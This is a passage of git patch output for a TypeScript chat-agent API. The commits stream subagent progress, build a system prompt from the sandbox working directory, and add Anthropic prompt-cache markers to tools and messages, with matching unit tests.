ctx.subagentModel ?? ctx.model, throwing if context - // wasn't populated by runAgentStep. Mirrors open-agents' task tool - // (`getSubagentModel(experimental_context, "task")`). 
+ outputSchema: taskOutputSchema, + execute: async function* ({ task, instructions }, { experimental_context, abortSignal }) { const subagentModel = getSubagentModel(experimental_context, "task"); - - try { - // `prompt` (not `messages: []`) is required — the AI SDK records zero - // steps and throws NoOutputGeneratedError if the model has only a - // system prompt with no user turn. Mirrors open-agents' task tool. - const result = streamText({ - model: subagentModel, - system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`, - prompt: "Complete this task and provide a summary of what you accomplished.", - tools: buildSubagentTools(), - stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT), - experimental_context, - abortSignal, - }); - - // Drain fullStream so the subagent actually runs to completion. - // Streaming progress back to the parent UI is not wired in this slim - // port — the parent sees one long-running tool call until the - // subagent finishes. - for await (const _part of result.fullStream) { - void _part; - } - - const response = await result.response; - const lastAssistant = response.messages.findLast(m => m.role === "assistant"); - const content = lastAssistant?.content; - - let summary = ""; - if (typeof content === "string") { - summary = content; - } else if (Array.isArray(content)) { - const lastText = content.findLast(p => p.type === "text"); - if (lastText && "text" in lastText) summary = lastText.text; + const subagentModelId = + typeof subagentModel === "string" + ? subagentModel + : (subagentModel as { modelId?: string }).modelId; + + // `prompt` (not `messages: []`) is required — the AI SDK records zero + // steps and throws NoOutputGeneratedError if the model has only a + // system prompt with no user turn. Mirrors open-agents' task tool. 
+ const result = streamText({ + model: subagentModel, + system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`, + prompt: "Complete this task and provide a summary of what you accomplished.", + tools: buildSubagentTools(), + stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT), + experimental_context, + abortSignal, + }); + + const startedAt = Date.now(); + let toolCallCount = 0; + let pending: TaskPendingToolCall | undefined; + let usage: LanguageModelUsage | undefined; + + // Emit an initial chunk so the UI can render elapsed time from a + // stable timestamp and show "Subagent · 0 tools · 0 tokens" before + // the first step finishes. + yield { toolCallCount, startedAt, modelId: subagentModelId }; + + for await (const part of result.fullStream) { + if (part.type === "tool-call") { + toolCallCount += 1; + pending = { name: part.toolName, input: part.input }; + yield { pending, toolCallCount, usage, startedAt, modelId: subagentModelId }; } - if (!summary) { - return { - success: false, - summary: "Subagent finished with no assistant text. The task may be incomplete.", - }; + if (part.type === "finish-step") { + usage = sumLanguageModelUsage(usage, part.usage); + // Keep the last observed `pending` so task UIs don't flicker + // back to an initializing state between subagent steps. + yield { pending, toolCallCount, usage, startedAt, modelId: subagentModelId }; } - - return { success: true, summary }; - } catch (error) { - const message = error instanceof Error ? error.message : String(error); - return { success: false, error: `Subagent failed: ${message}` }; } + + const response = await result.response; + const finalUsage = usage ?? (await result.totalUsage); + yield { + final: response.messages, + toolCallCount, + usage: finalUsage, + startedAt, + modelId: subagentModelId, + }; + }, + /** + * Extract the last assistant text from the subagent's transcript + * for inclusion in the parent agent's context. 
Mirrors open-agents' + * `toModelOutput` (`packages/agent/tools/task.ts`). Operates on the + * FINAL yielded chunk's `output.final`. + */ + toModelOutput: ({ output }) => { + const messages = output?.final; + if (!messages) return { type: "text", value: "Task completed." }; + + const lastAssistant = messages.findLast(m => m.role === "assistant"); + const content = lastAssistant?.content; + if (!content) return { type: "text", value: "Task completed." }; + + if (typeof content === "string") return { type: "text", value: content }; + + const lastTextPart = content.findLast(p => p.type === "text"); + if (!lastTextPart) return { type: "text", value: "Task completed." }; + + return { type: "text", value: lastTextPart.text }; }, }); From f3b8954c530300b1462e193e76c256997abf8f2d Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 21:15:01 -0500 Subject: [PATCH 09/10] feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7) Third open-agents → api cutover bundle. The handler hardcoded `workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set `currentBranch`, so the agent had no environment info in its system prompt and had to run `pwd` / `git branch` on every turn. Production verification (today, before this fix): agent: "My system prompt does not contain working directory or branch information." After this fix the agent receives an Environment section + Current branch line + cloud-sandbox checkpointing block — same shape as open-agents (sandbox.recoupable.com) emits. Changes: - New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles environment section → Current branch → cloud-sandbox checkpointing → custom instructions, all conditional on inputs. Mirrors open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts). 
- New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}` placeholder substitution. - `handleChatWorkflowStream`: connect the sandbox once for both skill discovery AND cwd/branch reading, then thread real values into `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves today's behavior; tools surface real errors later when they reconnect). - `runAgentStep`: build the system prompt via `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})` instead of using the static `agentCustomInstructions` directly. Scope reduced from the original "A.7+9" bundle: dropped contextLimit plumbing because it's a client-side display concern in open-agents, not server-side model routing (verified via grep — open-agents' server never reads context.contextLimit either). Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring); full suite 3121/3121 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * chore(chat-workflow): drop currentBranch handling from system prompt Per direction: branch is always `main` (the default branch) in api's deployment topology, so the per-branch `Current branch: ` line and cloud-sandbox checkpointing block don't add information today. Strip the templating to keep the system prompt focused on what's load-bearing (the Environment section indicating workspace-relative paths). - Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real per-session branch) - Drop `currentBranch` from `buildAgentSystemPrompt` options + rendering - Stop reading `sandbox.currentBranch` in handleChatWorkflowStream (the field stays on AgentContext.sandbox for type completeness; also consumed by createSandboxHandler unchanged) - Remove branch-related test cases Can be re-added later if/when meaningful per-session branches (e.g. 
xx/abcdef12 generated branches) land. Tests: 3119/3119 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call Build failure on bf1e2451 — runAgentStep was still passing `currentBranch: input.agentContext.sandbox.currentBranch` after buildAgentSystemPrompt's option was removed. Stripping it. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- .../workflows/__tests__/runAgentStep.test.ts | 22 ++++++++ app/lib/workflows/runAgentStep.ts | 12 ++++- .../__tests__/buildAgentSystemPrompt.test.ts | 32 +++++++++++ lib/chat/buildAgentSystemPrompt.ts | 53 +++++++++++++++++++ lib/chat/handleChatWorkflowStream.ts | 22 ++++---- 5 files changed, 131 insertions(+), 10 deletions(-) create mode 100644 lib/chat/__tests__/buildAgentSystemPrompt.test.ts create mode 100644 lib/chat/buildAgentSystemPrompt.ts diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts index 429a37505..0d48f81f8 100644 --- a/app/lib/workflows/__tests__/runAgentStep.test.ts +++ b/app/lib/workflows/__tests__/runAgentStep.test.ts @@ -88,6 +88,28 @@ describe("runAgentStep", () => { expect(meta?.modelId).toBe("anthropic/claude-haiku-4.5"); }); + it("includes cwd from agentContext.sandbox in the system prompt", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ + ...baseInput, + agentContext: { + sandbox: { + state: { type: "vercel" }, + workingDirectory: "/sandbox/mono", + }, + }, + writable: stream, + } as never); + + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { system?: string }; + expect(args.system).toMatch(/# Environment/); + expect(args.system).toMatch(/Working directory: \. 
\(workspace root\)/); + expect(args.system).toMatch(/workspace-relative paths/); + }); + it("the wired callback returns undefined for non-finish-step parts", async () => { const captured: unknown[] = []; vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 983bf4d7a..9d752e1a7 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -1,6 +1,7 @@ import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; import { gateway } from "@ai-sdk/gateway"; import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; +import { buildAgentSystemPrompt } from "@/lib/chat/buildAgentSystemPrompt"; import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext"; @@ -57,9 +58,18 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe ...input.agentContext, model: callModel, }; + // Build the system prompt with the sandbox's real cwd baked in + // (rather than a static `agentCustomInstructions` string). Without + // this the agent has to `pwd` on every turn because its prompt + // doesn't tell it where it is. Mirrors open-agents' + // `buildSystemPrompt`. 
+ const systemPrompt = buildAgentSystemPrompt({ + cwd: input.agentContext.sandbox.workingDirectory, + customInstructions: agentCustomInstructions, + }); const result = streamText({ model: callModel, - system: agentCustomInstructions, + system: systemPrompt, messages: modelMessages, tools, stopWhen: CHAT_AGENT_STOP_WHEN, diff --git a/lib/chat/__tests__/buildAgentSystemPrompt.test.ts b/lib/chat/__tests__/buildAgentSystemPrompt.test.ts new file mode 100644 index 000000000..81cb9268d --- /dev/null +++ b/lib/chat/__tests__/buildAgentSystemPrompt.test.ts @@ -0,0 +1,32 @@ +import { describe, it, expect } from "vitest"; +import { buildAgentSystemPrompt } from "@/lib/chat/buildAgentSystemPrompt"; + +describe("buildAgentSystemPrompt", () => { + it("emits only customInstructions when no cwd is provided", () => { + const prompt = buildAgentSystemPrompt({ customInstructions: "hello" }); + expect(prompt).toBe("hello"); + expect(prompt).not.toMatch(/Working directory/); + }); + + it("includes an Environment section when cwd is provided", () => { + const prompt = buildAgentSystemPrompt({ cwd: "/vercel/sandbox" }); + expect(prompt).toMatch(/# Environment/); + expect(prompt).toMatch(/Working directory: \. 
\(workspace root\)/); + expect(prompt).toMatch(/workspace-relative paths/); + }); + + it("appends customInstructions AFTER the environment section", () => { + const prompt = buildAgentSystemPrompt({ + cwd: "/sandbox", + customInstructions: "MARK_AT_END", + }); + const envIdx = prompt.indexOf("# Environment"); + const customIdx = prompt.indexOf("MARK_AT_END"); + expect(envIdx).toBeGreaterThanOrEqual(0); + expect(customIdx).toBeGreaterThan(envIdx); + }); + + it("returns empty string when all options are empty", () => { + expect(buildAgentSystemPrompt({})).toBe(""); + }); +}); diff --git a/lib/chat/buildAgentSystemPrompt.ts b/lib/chat/buildAgentSystemPrompt.ts new file mode 100644 index 000000000..922273ae7 --- /dev/null +++ b/lib/chat/buildAgentSystemPrompt.ts @@ -0,0 +1,53 @@ +const ENVIRONMENT_SECTION = `# Environment + +Working directory: . (workspace root) +Use workspace-relative paths for all file operations.`; + +export type BuildAgentSystemPromptOptions = { + /** + * Sandbox working directory. Triggers inclusion of the Environment + * section. The literal value isn't exposed to the model — the + * section just signals "you're in a workspace; use relative paths" + * (mirrors open-agents). + */ + cwd?: string; + /** + * Project-specific custom instructions appended at the end of the + * prompt (api's existing `agentCustomInstructions` — assistant file + * link prompt + recoup-api skill prompt). + */ + customInstructions?: string; +}; + +/** + * Assemble the system prompt for `runAgentStep`. Mirrors open-agents' + * `buildSystemPrompt` (`packages/agent/system-prompt.ts`) at the + * structural level — environment section → custom instructions — so + * the agent knows it's in a sandboxed workspace without having to + * run `pwd` on every prompt. + * + * Sections render only when their inputs are provided, so a request + * without sandbox context (or before sandbox boot) still produces a + * coherent (env-less) prompt. 
+ * + * `currentBranch` handling deliberately omitted in this slim port — + * the cloud-sandbox checkpointing block in open-agents templates a + * `git push -u origin {branch}` example per session, but in api's + * deployment topology the branch is always the org repo's default + * (`main`), so the per-branch templating doesn't add value yet. Add + * back when a meaningful per-session branch lands (e.g. xx/abcdef12 + * generated branches). + */ +export function buildAgentSystemPrompt(options: BuildAgentSystemPromptOptions): string { + const parts: string[] = []; + + if (options.cwd) { + parts.push(ENVIRONMENT_SECTION); + } + + if (options.customInstructions) { + parts.push(options.customInstructions); + } + + return parts.join("\n\n"); +} diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 818c70f8c..5a1c89603 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -94,18 +94,25 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise> = []; + let workingDirectory: string = DEFAULT_WORKING_DIRECTORY; try { const sandbox = await connectVercel(session.sandbox_state as VercelState); + workingDirectory = sandbox.workingDirectory; const dirs = await getSandboxSkillDirectories(sandbox); skills = await discoverSkills(sandbox, dirs); } catch (error) { console.error( - "[handleChatWorkflowStream] skill discovery failed; continuing with empty catalog:", + "[handleChatWorkflowStream] sandbox connect / skill discovery failed; continuing with defaults:", error, ); } @@ -119,10 +126,7 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise Date: Thu, 21 May 2026 21:46:37 -0500 Subject: [PATCH 10/10] feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Fourth open-agents → api cutover bundle. 
runAgentStep was sending the same system prompt + tool definitions on every turn as fresh input, even though Anthropic prompt caching can shave 90% off subsequent input cost. Production traces showed `cacheReadTokens: 0` on every api turn, while open-agents shows cacheRead matching cacheWrite from the prior turn — i.e. open-agents reuses the cached prefix. Changes (SRP — one function per file): - `lib/agent/contextManagement/isAnthropicModel.ts` — predicate port of open-agents' `packages/agent/context-management/cache-control.ts:5`. - `lib/agent/contextManagement/addCacheControlToTools.ts` — marks the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only conserves Anthropic's 4-breakpoint limit. - `lib/agent/contextManagement/addCacheControlToMessages.ts` — marks the LAST message with `cacheControl` on every step, per Anthropic's "mark the final block of the final message" guidance. `runAgentStep` now: - Wraps the tool set via `addCacheControlToTools(...)` before passing to streamText (static — set once per step). - Adds a `prepareStep` callback that wraps `messages` via `addCacheControlToMessages(...)` on every internal model call. Production behavior reproducer (Haiku 4.5, identical 2-turn prompt to both backends): api prod (broken): turn1 cacheWrite=0 cacheRead=0 cost=$0.005952 turn2 cacheWrite=0 cacheRead=0 cost=$0.005959 → flat cost; full input billed every turn. open-agents prod: turn1 cacheWrite=10966 cacheRead=0 turn2 cacheWrite=12 cacheRead=10966 cost drops 12x → near-full prefix re-read from cache on turn 2. After this PR, api should match open-agents' caching curve. Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5 addCacheControlToMessages + 2 runAgentStep wiring assertions); full suite 3138/3138 pass; lint clean. 
Co-authored-by: Claude Opus 4.7 (1M context) --- .../workflows/__tests__/runAgentStep.test.ts | 53 ++++++++++++++++ app/lib/workflows/runAgentStep.ts | 17 ++++- .../addCacheControlToMessages.test.ts | 60 ++++++++++++++++++ .../__tests__/addCacheControlToTools.test.ts | 63 +++++++++++++++++++ .../__tests__/isAnthropicModel.test.ts | 36 +++++++++++ .../addCacheControlToMessages.ts | 44 +++++++++++++ .../addCacheControlToTools.ts | 50 +++++++++++++++ .../contextManagement/isAnthropicModel.ts | 26 ++++++++ 8 files changed, 348 insertions(+), 1 deletion(-) create mode 100644 lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts create mode 100644 lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts create mode 100644 lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts create mode 100644 lib/agent/contextManagement/addCacheControlToMessages.ts create mode 100644 lib/agent/contextManagement/addCacheControlToTools.ts create mode 100644 lib/agent/contextManagement/isAnthropicModel.ts diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts index 0d48f81f8..b2e90475b 100644 --- a/app/lib/workflows/__tests__/runAgentStep.test.ts +++ b/app/lib/workflows/__tests__/runAgentStep.test.ts @@ -110,6 +110,59 @@ describe("runAgentStep", () => { expect(args.system).toMatch(/workspace-relative paths/); }); + it("wraps tools with anthropic cacheControl on the last tool before passing to streamText", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ ...baseInput, writable: stream } as never); + + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { + tools: Record< + string, + { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } } + >; + }; + const toolNames = Object.keys(args.tools); + 
expect(toolNames.length).toBeGreaterThan(0); + const lastTool = args.tools[toolNames[toolNames.length - 1]!]!; + expect(lastTool.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" }); + // Earlier tools should NOT carry the cache-control marker (Anthropic 4-breakpoint limit). + if (toolNames.length > 1) { + expect(args.tools[toolNames[0]!]?.providerOptions).toBeUndefined(); + } + }); + + it("wires a prepareStep callback that marks the last message with cacheControl", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ ...baseInput, writable: stream } as never); + + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { + prepareStep?: (opts: { + messages: Array<{ role: string; providerOptions?: Record }>; + model: unknown; + steps?: unknown[]; + }) => { messages?: unknown[] } | undefined; + }; + expect(typeof args.prepareStep).toBe("function"); + const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never; + const result = args.prepareStep!({ + messages: [ + { role: "user", content: "first" } as never, + { role: "user", content: "second" } as never, + ], + model: anthropicModel, + steps: [], + }); + const out = result?.messages as Array<{ providerOptions?: Record }>; + expect(out).toBeDefined(); + expect(out[0]?.providerOptions).toBeUndefined(); + expect(out[1]?.providerOptions).toEqual({ anthropic: { cacheControl: { type: "ephemeral" } } }); + }); + it("the wired callback returns undefined for non-finish-step parts", async () => { const captured: unknown[] = []; vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 9d752e1a7..7ed847d5d 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -6,6 +6,8 
@@ import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext"; import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback"; +import { addCacheControlToTools } from "@/lib/agent/contextManagement/addCacheControlToTools"; +import { addCacheControlToMessages } from "@/lib/agent/contextManagement/addCacheControlToMessages"; export type RunAgentStepInput = { messages: UIMessage[]; @@ -48,7 +50,14 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe }); const modelMessages = await convertToModelMessages(input.messages); - const tools = buildAgentTools({ skills: input.agentContext.skills }); + // Mark the last tool with `cacheControl: { type: "ephemeral" }` so + // Anthropic caches the tool-definitions block across the + // conversation. Per-step message caching is wired via `prepareStep` + // below. Mirrors open-agents' `prepareCall` + `prepareStep` split. + const tools = addCacheControlToTools({ + tools: buildAgentTools({ skills: input.agentContext.skills }), + model: input.modelId, + }); // Construct the model here (not in the workflow input) — LanguageModel // instances aren't JSON-serializable and can't ride durable inputs. // Then attach to AgentContext so tools see the same model the parent @@ -74,6 +83,12 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe tools, stopWhen: CHAT_AGENT_STOP_WHEN, experimental_context: agentContext, + // Mark the LAST message with cacheControl on every step so Anthropic + // incrementally caches the conversation prefix. Mirrors open-agents' + // `prepareStep` in `open-harness-agent.ts:100`. 
+ prepareStep: ({ messages, model }) => ({ + messages: addCacheControlToMessages({ messages, model }), + }), }); // Acquire the writer once and release in `finally` so a thrown chunk diff --git a/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts b/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts new file mode 100644 index 000000000..19b618dca --- /dev/null +++ b/lib/agent/contextManagement/__tests__/addCacheControlToMessages.test.ts @@ -0,0 +1,60 @@ +import { describe, it, expect } from "vitest"; +import { addCacheControlToMessages } from "@/lib/agent/contextManagement/addCacheControlToMessages"; + +const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never; +const openaiModel = { provider: "openai", modelId: "gpt-5" } as never; + +const makeMsgs = () => [ + { role: "user", content: "first" }, + { role: "assistant", content: "ack" }, + { role: "user", content: "second" }, +]; + +describe("addCacheControlToMessages", () => { + it("returns messages unchanged for non-Anthropic models", () => { + const messages = makeMsgs(); + const result = addCacheControlToMessages({ messages: messages as never, model: openaiModel }); + expect(result).toEqual(messages); + }); + + it("returns messages unchanged when the array is empty", () => { + const result = addCacheControlToMessages({ messages: [], model: anthropicModel }); + expect(result).toEqual([]); + }); + + it("marks ONLY the last message with ephemeral cacheControl (per Anthropic guidance)", () => { + const messages = makeMsgs(); + const result = addCacheControlToMessages({ + messages: messages as never, + model: anthropicModel, + }) as Array<{ providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }>; + expect(result[0]?.providerOptions).toBeUndefined(); + expect(result[1]?.providerOptions).toBeUndefined(); + expect(result[2]?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" }); + }); + + it("preserves existing 
providerOptions on the last message when merging the anthropic marker", () => { + const messages = [ + { role: "user", content: "first" }, + { + role: "user", + content: "second", + providerOptions: { openai: { foo: "bar" } }, + }, + ]; + const result = addCacheControlToMessages({ + messages: messages as never, + model: anthropicModel, + }) as Array<{ providerOptions?: Record<string, unknown> }>; + expect(result[1]?.providerOptions?.openai).toEqual({ foo: "bar" }); + expect(result[1]?.providerOptions?.anthropic).toEqual({ + cacheControl: { type: "ephemeral" }, + }); + }); + + it("does NOT mutate the input messages array", () => { + const messages = makeMsgs(); + addCacheControlToMessages({ messages: messages as never, model: anthropicModel }); + expect((messages[2] as { providerOptions?: unknown }).providerOptions).toBeUndefined(); + }); +}); diff --git a/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts b/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts new file mode 100644 index 000000000..af05104f2 --- /dev/null +++ b/lib/agent/contextManagement/__tests__/addCacheControlToTools.test.ts @@ -0,0 +1,63 @@ +import { describe, it, expect } from "vitest"; +import { addCacheControlToTools } from "@/lib/agent/contextManagement/addCacheControlToTools"; + +const anthropicModel = { provider: "anthropic", modelId: "claude-haiku-4.5" } as never; +const openaiModel = { provider: "openai", modelId: "gpt-5" } as never; + +const makeTools = () => ({ + bash: { description: "run bash", inputSchema: {} }, + read: { description: "read file", inputSchema: {} }, + write: { description: "write file", inputSchema: {} }, +}); + +describe("addCacheControlToTools", () => { + it("returns tools unchanged for non-Anthropic models", () => { + const tools = makeTools(); + const result = addCacheControlToTools({ tools, model: openaiModel }); + expect(result).toEqual(tools); + }); + + it("returns tools unchanged when the toolset is empty", () => { + const tools = {}; + const
result = addCacheControlToTools({ tools, model: anthropicModel }); + expect(result).toEqual({}); + }); + + it("marks ONLY the last tool with ephemeral cacheControl (Anthropic's 4-breakpoint limit)", () => { + const tools = makeTools(); + const result = addCacheControlToTools({ tools, model: anthropicModel }) as Record< + string, + { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } } + >; + expect(result.bash?.providerOptions).toBeUndefined(); + expect(result.read?.providerOptions).toBeUndefined(); + expect(result.write?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral" }); + }); + + it("preserves existing providerOptions on the last tool when merging the anthropic marker", () => { + const tools = { + a: { description: "a", inputSchema: {} }, + b: { + description: "b", + inputSchema: {}, + providerOptions: { openai: { foo: "bar" } }, + }, + } as never; + const result = addCacheControlToTools({ tools, model: anthropicModel }) as Record< + string, + { providerOptions?: Record<string, unknown> } + >; + expect(result.b?.providerOptions?.openai).toEqual({ foo: "bar" }); + expect(result.b?.providerOptions?.anthropic).toEqual({ cacheControl: { type: "ephemeral" } }); + }); + + it("respects a custom providerOptions override", () => { + const tools = { only: { description: "x", inputSchema: {} } } as never; + const result = addCacheControlToTools({ + tools, + model: anthropicModel, + providerOptions: { anthropic: { cacheControl: { type: "ephemeral_1h" } } }, + }) as Record<string, { providerOptions?: { anthropic?: { cacheControl?: { type: string } } } }>; + expect(result.only?.providerOptions?.anthropic?.cacheControl).toEqual({ type: "ephemeral_1h" }); + }); +}); diff --git a/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts b/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts new file mode 100644 index 000000000..ffc12fb4f --- /dev/null +++ b/lib/agent/contextManagement/__tests__/isAnthropicModel.test.ts @@ -0,0 +1,36 @@ +import { describe, it, expect } from "vitest"; +import { isAnthropicModel } from
"@/lib/agent/contextManagement/isAnthropicModel"; + +describe("isAnthropicModel", () => { + it("returns true for a string model id containing 'anthropic'", () => { + expect(isAnthropicModel("anthropic/claude-haiku-4.5" as never)).toBe(true); + }); + + it("returns true for a string model id containing 'claude' (no provider prefix)", () => { + expect(isAnthropicModel("claude-3-5-haiku" as never)).toBe(true); + }); + + it("returns false for non-Anthropic string model ids", () => { + expect(isAnthropicModel("openai/gpt-5.2" as never)).toBe(false); + expect(isAnthropicModel("google/gemini-3" as never)).toBe(false); + }); + + it("returns true for a model object whose `provider` is 'anthropic'", () => { + expect(isAnthropicModel({ provider: "anthropic", modelId: "claude-haiku-4.5" } as never)).toBe( + true, + ); + }); + + it("returns true for a model object whose `provider` contains 'anthropic' (gateway-prefixed)", () => { + expect(isAnthropicModel({ provider: "gateway.anthropic", modelId: "x" } as never)).toBe(true); + }); + + it("returns true for a model object whose `modelId` contains 'anthropic' or 'claude'", () => { + expect(isAnthropicModel({ provider: "gateway", modelId: "anthropic/x" } as never)).toBe(true); + expect(isAnthropicModel({ provider: "gateway", modelId: "claude-x" } as never)).toBe(true); + }); + + it("returns false for a model object with no anthropic / claude markers", () => { + expect(isAnthropicModel({ provider: "openai", modelId: "gpt-5" } as never)).toBe(false); + }); +}); diff --git a/lib/agent/contextManagement/addCacheControlToMessages.ts b/lib/agent/contextManagement/addCacheControlToMessages.ts new file mode 100644 index 000000000..7051998f2 --- /dev/null +++ b/lib/agent/contextManagement/addCacheControlToMessages.ts @@ -0,0 +1,44 @@ +import type { JSONValue, LanguageModel, ModelMessage } from "ai"; +import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel"; + +type ProviderOptions = Record<string, Record<string, JSONValue>>; + +const
DEFAULT_PROVIDER_OPTIONS: ProviderOptions = { + anthropic: { cacheControl: { type: "ephemeral" } }, +}; + +/** + * Mark the LAST message with `cacheControl: { type: "ephemeral" }` so + * Anthropic incrementally caches the conversation prefix. Per + * Anthropic's docs: "Mark the final block of the final message with + * cache_control so the conversation can be incrementally cached." + * + * Port of open-agents' `addCacheControl({messages, model})` overload + * in `packages/agent/context-management/cache-control.ts`. + * + * For non-Anthropic models the input is returned unchanged. The input + * array is not mutated — a new array of message refs is returned. + */ +export function addCacheControlToMessages(opts: { + messages: ModelMessage[]; + model: LanguageModel; + providerOptions?: ProviderOptions; +}): ModelMessage[] { + const { messages, model, providerOptions = DEFAULT_PROVIDER_OPTIONS } = opts; + + if (!isAnthropicModel(model)) return messages; + if (messages.length === 0) return messages; + + const lastIndex = messages.length - 1; + return messages.map((message, index) => + index === lastIndex + ? { + ...message, + providerOptions: { + ...(message as { providerOptions?: ProviderOptions }).providerOptions, + ...providerOptions, + }, + } + : message, + ); +} diff --git a/lib/agent/contextManagement/addCacheControlToTools.ts b/lib/agent/contextManagement/addCacheControlToTools.ts new file mode 100644 index 000000000..2b63cab18 --- /dev/null +++ b/lib/agent/contextManagement/addCacheControlToTools.ts @@ -0,0 +1,50 @@ +import type { JSONValue, LanguageModel, ToolSet } from "ai"; +import { isAnthropicModel } from "@/lib/agent/contextManagement/isAnthropicModel"; + +type ProviderOptions = Record<string, Record<string, JSONValue>>; + +const DEFAULT_PROVIDER_OPTIONS: ProviderOptions = { + anthropic: { cacheControl: { type: "ephemeral" } }, +}; + +/** + * Mark the LAST tool in a toolset with `cacheControl: { type: "ephemeral" }` + * so Anthropic caches the tool-definitions block across the conversation.
+ * + * Port of open-agents' `addCacheControl({tools, model})` overload in + * `packages/agent/context-management/cache-control.ts`. Why only the + * last tool: Anthropic enforces a max of 4 cache breakpoints, and we + * spend one each on the system prompt + messages, so we conserve by + * marking just the trailing tool entry (the message's cumulative + * cache covers the rest). + * + * For non-Anthropic models the input is returned unchanged. + */ +export function addCacheControlToTools<T extends ToolSet>(opts: { + tools: T; + model: LanguageModel; + providerOptions?: ProviderOptions; +}): T { + const { tools, model, providerOptions = DEFAULT_PROVIDER_OPTIONS } = opts; + + if (!isAnthropicModel(model)) return tools; + + const entries = Object.entries(tools); + if (entries.length === 0) return tools; + + const lastIndex = entries.length - 1; + return Object.fromEntries( + entries.map(([name, t], index) => [ + name, + index === lastIndex + ? { + ...t, + providerOptions: { + ...(t as { providerOptions?: ProviderOptions }).providerOptions, + ...providerOptions, + }, + } + : t, + ]), + ) as T; +} diff --git a/lib/agent/contextManagement/isAnthropicModel.ts 